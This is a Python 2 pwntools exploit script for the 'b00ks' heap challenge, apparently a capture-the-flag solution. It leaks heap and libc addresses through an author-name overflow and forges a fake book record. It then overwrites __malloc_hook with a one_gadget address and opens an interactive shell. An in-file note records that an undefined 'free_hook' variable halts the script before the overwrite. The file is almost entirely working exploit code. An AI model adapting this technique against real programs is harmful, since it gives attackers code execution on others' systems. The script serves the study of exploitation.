from pwn import *
# Target process plus the two ELF images the rest of the script reads symbols
# from.  Both paths are relative to the working directory; `libc` must be the
# exact build the hard-coded offsets further down were taken from, otherwise
# the computed addresses are garbage.  `elf` is loaded but not used below.
TARGET = "./b00ks"
LIBC = "./libc"

s = process(TARGET)
elf = ELF(TARGET)
libc = ELF(LIBC)
def first(name):
    """Answer the initial "Enter author name: " prompt with *name*.

    Blocks until the prompt has been received from `s`; the same prompt is
    also used by menu option 5 (see change()).
    """
    prompt = "Enter author name: "
    s.recvuntil(prompt)
    s.sendline(name)
def create(size, name, dis_size, content):
    """Menu option 1: create a book.

    size / dis_size are sent as decimal strings; name and content are sent
    verbatim (Python 2 str, as the rest of the file assumes).  Each answer is
    sent only after the matching prompt has been read, so a missing prompt
    blocks here indefinitely.
    """
    dialogue = [
        ("> ", "1"),
        ("Enter book name size: ", str(size)),
        ("Enter book name (Max 32 chars): ", name),
        ("Enter book description size: ", str(dis_size)),
        ("Enter book description: ", content),
    ]
    for prompt, answer in dialogue:
        s.recvuntil(prompt)
        s.sendline(answer)
def delete(number):
    """Menu option 2: delete the book with id *number* (sent as decimal)."""
    book_id = str(number)
    s.recvuntil("> ")
    s.sendline("2")
    s.recvuntil("Enter the book id you want to delete: ")
    s.sendline(book_id)
def edit(ids, disc):
    """Menu option 3: replace the description of book *ids* with *disc*.

    *ids* is sent as a decimal string, *disc* verbatim.
    """
    dialogue = [
        ("> ", "3"),
        ("Enter the book id you want to edit: ", str(ids)),
        ("Enter new book description: ", disc),
    ]
    for prompt, answer in dialogue:
        s.recvuntil(prompt)
        s.sendline(answer)
def show():
    """Menu option 4.  Only the selection is sent; the caller reads whatever
    the program prints afterwards directly from `s`."""
    choice = "4"
    s.recvuntil("> ")
    s.sendline(choice)
def change(name):
    """Menu option 5: re-enter the author name as *name* (sent verbatim)."""
    dialogue = [
        ("> ", "5"),
        ("Enter author name: ", name),
    ]
    for prompt, answer in dialogue:
        s.recvuntil(prompt)
        s.sendline(answer)
def quit():
    """Menu option 6 (presumably the program's exit entry; not called below).

    Note: this shadows the builtin `quit`; kept as-is because the name is
    part of the script's interface.
    """
    choice = "6"
    s.recvuntil("> ")
    s.sendline(choice)
# --- main flow (Python 2: bare `print` statements and str-based pwntools I/O) ---
first("K"*32)
create(128,"1"*128,128,"A"*128)
show()
# The 32-byte author name is echoed back; the 6 bytes that follow it are
# zero-padded to 8 and decoded as a heap address.
s.recvuntil("K"*32)
heap = u64(s.recv(6)+"\x00\x00")
print "heap : " + hex(heap)
delete(1)
# 128-byte description: 80 filler bytes, the integer 31337 (used later as a
# book id by edit()/delete()) and two heap-relative pointers.
pay = "B"*(8*10)
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(heap - 0x60)
create(128,"2"*128,128,pay)
create(128,"3"*128,128,"C"*128)
create(128,"4"*128,128,"D"*128)
delete(3)
change("K"*32)
show()
# Second leak: 6 bytes after "Name: ", zero-padded and decoded as a libc pointer.
s.recvuntil("Name: ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
# 0x3c4b78 and 0xf02a4 are hard-coded offsets into the bundled ./libc build;
# they are presumably invalid for any other libc — TODO confirm against the
# libc actually in use before relying on the printed addresses.
libc_base = leak - 0x3c4b78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_shot = libc_base + 0xf02a4
print "libc_base : " + hex(libc_base)
# NOTE(review): `free_hook` is never assigned anywhere in this script, so this
# line raises NameError and nothing after it executes.
print "free_hook : " + hex(free_hook)
print "malloc_hook : " + hex(malloc_hook)
print "one_shot : " + hex(one_shot)
# Same record layout as above, but the last pointer is now malloc_hook.
pay = "B"*32
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(malloc_hook)
edit(31337,pay)
edit(31337,p64(one_shot))
# Last menu action before handing the connection to the operator.
delete(31337)
s.interactive()